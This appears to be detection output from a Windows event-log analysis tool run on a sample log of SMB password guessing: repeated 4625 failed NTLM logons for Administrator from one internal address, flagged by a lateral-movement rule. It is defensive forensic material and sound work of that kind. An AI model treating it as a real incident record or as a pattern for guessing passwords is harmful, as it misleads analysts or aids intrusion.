2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5np7HeCPAFTDdTXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gXbe2jEJVtwaQXlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hZFiUCJnaBdHcw4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a71wyo41KV1ZoT7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogB17WdeOiC19rqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ANOLPWG12lkW39Ei  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y1vf7OUxb6TH3Q4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxU5yumSieUzSgzH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9K5EoWWASU8SlSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PwZLRPFxaFWwjZEe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8fXgFFb3HTMunsoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R1RozAr1uhux4cYW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7EmuUSv03RnhKsF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jw410HEW8EC3MC9f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTYp8cEbt3Yggo3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWJVzgYLWIo7SGCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DP13jPdW5Gdl8z56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LNXOWjHmMDhfFVon  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kka1RiF3f7Nhkf8x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2o90lG6attzWU4ZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PyPK9kuJdflQ4RKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a9I3El7d7anR0kIz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDUMTEfNhFuuqMle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e0F70d1WstkqnQgA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bm0txApQSp1U42N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JeEe5ENSIZnfc3FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oasE54Z1FlpswY0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhje1BgvxOlG28JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9iTIv4UQ4En9RA2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mg8KFm1lCeImj8Sb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h17Fz1s6GJki61jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Pjjn4FAkJn4h32r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARVx3FAAww8Gmfvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sYIwPg5k1wpvWobN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0sfhYQ54SjC4JTX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nfZYnUPV40FShcqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XYbvWVCT0tFixZTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XC6Vmz0ql8myDuGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJ8JvuvZZzwSOzFo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s06yKaogI6FYkXla  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCjOc7PguxwNKoQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BX5IosnpdYZK5xZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfMjB1epEm64wVEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb4FVO2SKsoMyt1K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1qoRw2jjFx4F6Wx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ImiLeiteLoSw32I0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcIYD47BIEP8gB0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lUAeB15aWamcaZ8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFOKiSDWc1dWjzge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hqyMtzjKSJEtEAdx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtHsItpyFHQxvLWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RdGMqIhUGHj23Xm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfE5LVmrPaAFLwBR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1swKSla5gkdOwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kL9MdVnRVogiP7hF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aQ0hRdwZvC5PBcXl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ctbv73J0Dot9raD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wKpWApJIKkjbtaPB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kVTAv9VoNpUyxQFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xb3t1dpuk9JZri5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fy0UrW8TWrxAOX90  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iUXUbUsiE6Ahh9iD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2QQdQ6rQYLBf15AF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zG4eJLuQ4u2dKQG0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCfwHs2gVGiRc3Fy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67TcwQfTxgTtQvCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imnSPKAKYzrCKSUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMNbdjiXNUY0gTfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOAH0gjfs8JcXSMO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TnnB4KPBiDvKMsUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aZRgpa5riqIEWhQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBL4nrs7f6cjlfsT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fgDupzqipe5jK0r5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
